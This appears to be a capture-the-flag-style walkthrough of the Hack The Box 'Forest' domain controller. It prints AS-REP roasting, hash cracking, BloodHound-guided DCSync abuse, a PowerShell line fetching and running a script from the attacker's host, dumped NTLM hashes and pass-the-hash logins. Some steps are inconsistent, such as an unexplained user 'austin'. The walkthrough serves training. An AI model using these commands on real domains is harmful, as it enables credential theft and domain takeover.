Follow along in my OSCP journey, this is my target 9 of the TJNULL’s OSCP list.
How to use this walkthrough?
To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.161Autorecon
While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2021-02-03 20:03:21Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-Firs
t-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49686/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49705/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (94%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows
7 (93%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80SVN%E=4%D=2/3%OT=53%CT=1%CU=43958%PV=Y%DS=2%DC=T%G=Y%TM=601B0
OS:081%P=x86_64-unknown-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TS=A)SEQ(SP=107%
OS:GCD=1%ISR=10B%CI=I%II=I%TS=A)SEQ(SP=107%GCD=1%ISR=10B%CI=I%TS=A)OPS(O1=M
OS:54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%
OS:O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%
OS:DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=
OS:Z)Uptime guess: 0.008 days (since Wed Feb 3 14:47:41 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 2h52m54s, deviation: 4h37m08s, median: 12m53s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 25426/tcp): CLEAN (Couldn't connect)
| Check 2 (port 32753/tcp): CLEAN (Couldn't connect)
| Check 3 (port 8593/udp): CLEAN (Timeout)
| Check 4 (port 44587/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2021-02-03T12:11:36-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-02-03T20:11:38
|_ start_date: 2021-02-03T20:00:53
This machine is really nice because there are a lot of services and going through the process of checking them out will help you filter them in the future. We got juicy services running such as SMB, Kerberos, LDAP. Let’s focus on these 3 and then explore the rest if we don’t find a path through these.
Also, we don’t miss the FQDN given to the machine: forest.htb.local that might be useful later.
SMB — 139,445
SMB Permissions
It doesn’t look like we have much to look at.
| \\10.10.10.161\ADMIN$: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED | Anonymous access: <none> | \\10.10.10.161\C$: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED | Anonymous access: <none> | \\10.10.10.161\IPC$: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED | Anonymous access: READ | \\10.10.10.161\NETLOGON: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED |_ Anonymous access: <none>Enum4Linux
htb.local
[+] 10.10.10.161 appears to be a root/parent DC===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at /pentest/intelligence-gathering/enum4linux/enum4linux.pl line 458.
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565=============================
| Users on 10.10.10.161 |
=============================
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]andy[+] Getting builtin groups:
Use of uninitialized value $global_workgroup in concatenation (.) or string at /pentest/intelligence-gathering/enum4linux/e
num4linux.pl line 574.
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225][+] Getting local groups:
Use of uninitialized value $global_workgroup in concatenation (.) or string at /pentest/intelligence-gathering/enum4linux/e
num4linux.pl line 574.
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d][+] Getting domain groups:
Use of uninitialized value $global_workgroup in concatenation (.) or string at /pentest/intelligence-gathering/enum4linux/enum4linux.pl line 614.
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
We get a lot of information from enum4linux, let us save those users in a file and confirm them with Kerberos.
Kerbrute
kerbrute-386 userenum -d htb.local --dc 10.10.10.161 users.txtNow we can use that output
[+] VALID USERNAME: Administrator@htb.local
[+] VALID USERNAME: HealthMailboxc3d7722@htb.local
[+] VALID USERNAME: HealthMailbox6ded678@htb.local
[+] VALID USERNAME: HealthMailbox670628e@htb.local
[+] VALID USERNAME: HealthMailbox968e74d@htb.local
[+] VALID USERNAME: HealthMailboxfc9daad@htb.local
[+] VALID USERNAME: HealthMailboxc0a90c9@htb.local
[+] VALID USERNAME: HealthMailbox83d6781@htb.local
[+] VALID USERNAME: mark@htb.local
[+] VALID USERNAME: HealthMailboxb01ac64@htb.local
[+] VALID USERNAME: HealthMailbox7108a4e@htb.local
[+] VALID USERNAME: sebastien@htb.local
[+] VALID USERNAME: lucinda@htb.local
[+] VALID USERNAME: HealthMailbox0659cc1@htb.local
[+] VALID USERNAME: HealthMailboxfd87238@htb.local
[+] VALID USERNAME: andy@htb.local
[+] VALID USERNAME: svc-alfresco@htb.local
[+] VALID USERNAME: mark@htb.local
[+] VALID USERNAME: andy@htb.local
[+] VALID USERNAME: forest@htb.local
[+] VALID USERNAME: Mark@htb.local
[+] VALID USERNAME: administrator@htb.local
[+] VALID USERNAME: Andy@htb.local
[+] VALID USERNAME: sebastien@htb.local
[+] VALID USERNAME: MARK@htb.local
[+] VALID USERNAME: Forest@htb.localHINT
Knowing users on a DC with those services running is usually enough to attempt an attack that will potentially return a hash. Can you find what I am talking about?
.
.
.
.
Kerberoasting ❤
We can create a users’ list users.txt, and then use the impacket GetNPUsers.py script to perform kerberoasting on Forest.
python3 /opt/impacket/examples/GetNPUsers.py htb.local/ -usersfile ../exploit/users.txt -dc-ip 10.10.10.161Jackpot, the svc-alfresco account seems to provides us with a sweet response.
$krb5asrep$23$svc-alfresco@HTB.LOCAL:198f3696d57d6c6c76ed0ddc3a0f6a66$fafe1be32d82a3ed1070dc867740c8b484f6a8290bb42a02fa729892020b1c673f58db87d46b7306eebdb1a3e01c5819ce11a6bede7e2ab8cf138d8b9bc9c799e369472b9480c5fe2fa973cff22f0551122427c606515a57e1410575999f1d12110aa4f95a5d987f56f9c7ecb4f28b80d3f399b91e2f2799712c91aa5b5619a15706fdedb2921eefcbf36a6867c2f7f8195dbce73924637201015ed85e6274a2fe0730da5a71337e224222ee3da743b27624a997e48cfbfd736f250120f6db28296e3a09cf2cac5d578e126f461c05b1c29701a69a6e1687d161599f2045099e8fa0b6eef5fcLet’s save it in a file so we can crack it with Johnnnny.
Cracking the hash
sudo john --wordlist=/usr/share/wordlists/rockyou.txt svc-alfresco_hash
We got some credentials we can use svc-alfresco:s3rvice
HINT
Where can we use that credential? Are there any services that can be enumerated again using credentials?
.
.
.
.
We can use it against the API, SMB, and LDAP.
It does seem that we have access to more shares but we don’t find anything of value. We didn’t try LDAP and jumped straight to the API, let’s use evil-winRM (https://github.com/Hackplayers/evil-winrm you can read here about the conditions for this to work)
evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'We’re in! We do some initial enumeration but we don’t find anything that we can use.
Let’s pull up the big guns and use Bloodhound
Bloodhound
I used this article to help me set up Bloodhound and start sniffing for cool stuff.
Install bloodhound
apt-get install bloodhoundStart the Database
neo4j consoleStart Bloodhound
bloodhoundRun Sharphound on the victim
This step collects the information that Bloodhound will use to determine if you have any interesting access.
. .\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain htb.local -ZipFileName loot.zipTransfer the output
On kali
mkdir smb
cd smb/
impacket-smbserver ShareName `pwd`On the victim
New-PSDrive -Name "DriveName" -PSProvider "FileSystem" -Root "\\10.10.14.46\ShareName"
cd z:\
cp c:\tmp\file .Feeding Bloodhound
give bloodhound the zip file, then look for the burger menu and click on path to domain admins
Our user seems to be part of a queue of memberships
After that queue, we start seeing that the Account Operators Group has GenericAll access to Exchange Windows Permissions
Small intersection with Interesting windows permissions
- GenericAll — full rights to the object (add users to a group or reset user’s password)
- GenericWrite — update object’s attributes (i.e logon script)
- WriteOwner — change object owner to attacker-controlled, the user takes over the object
- WriteDACL — modify object’s ACEs and give attacker full control right over the object
- AllExtendedRights — ability to add a user to a group or reset password
- ForceChangePassword — ability to change user’s password
- Self (Self-Membership) — ability to add yourself to a group
After adding all this knowledge to our brains, we keep going
You can check what the permissions mean, Bloodhound gives you a really nice explanation
And we can see that Exchange Windows Permissions has WriteDacl
That seems to be GG!
Summary
We need to abuse genericAll to obtain the Exchange group privileges and finally exploit WriteDACL to give ourselves Administrator privileges. Since administrator is part of the Domain Ddmins it’s GG after that.
Exploiting Bloodhound findings
Manually — method 1
PS C:\\Users\\svc-alfresco\\appdata> Add-ADGroupMember -Identity "Exchange Trusted Subsystem" -Members svc-alfrescoWe need to re-login to svc-alfresco for the group membership to take effect. Let's load up PowerView to grant austin his DCSync rights!
iex (new-object net.webclient).downloadstring('<http://10.10.14.46/PowerView.ps1>')
Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity austin -Rights DCSyncWe then use austin to dump the hashes
secretsdump.py -just-dc 'htb\\austin:password@10.10.10.161'and use evil-winrm or smbexec.
smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6' 'htb\\administrator@10.10.10.161'Manually — method 2
Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco;
$username = "htb\\svc-alfresco";
$password = "s3rvice";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr;
Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\\Domain Admins' -Rights DCSyncNow that we are part of this group we can attempt to gather more hashes
secretsdump.py svc-alfresco:s3rvice@10.10.10.161We’re getting everyone’s hashes
kali@kali:/opt/windows$ python3 /opt/impacket/examples/secretsdump.py svc-alfresco:s3rvice@10.10.10.161 Impacket v0.9.21.dev1+20200219.164620.d757c3a4 - Copyright 2020 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...
...Now we can just use evil-winrm and connect as Administrators
evil-winrm -i 10.10.10.161 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6Automated method
For this automated section, I found an article that explains how to abuse them.
Using ACLPWN
aclpwn --domain htb.local -d htb.local -du neo4j -dp redactedpassword -f svc-alfresco -u svc-alfresco -p s3rvice -s 10.10.10.161This should feed on what we have pulled with Sharphound and then automatically perform the steps to grant you the max possible privileges.
What did I learn?
- We consolidated our knowledge of kerberoasting
- We learned so much about windows permissions and privileges.
- And we learned how to extract and analyze that information with Bloodhound
- Finally, we learned different techniques to leverage the findings from Bloodhound.
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.
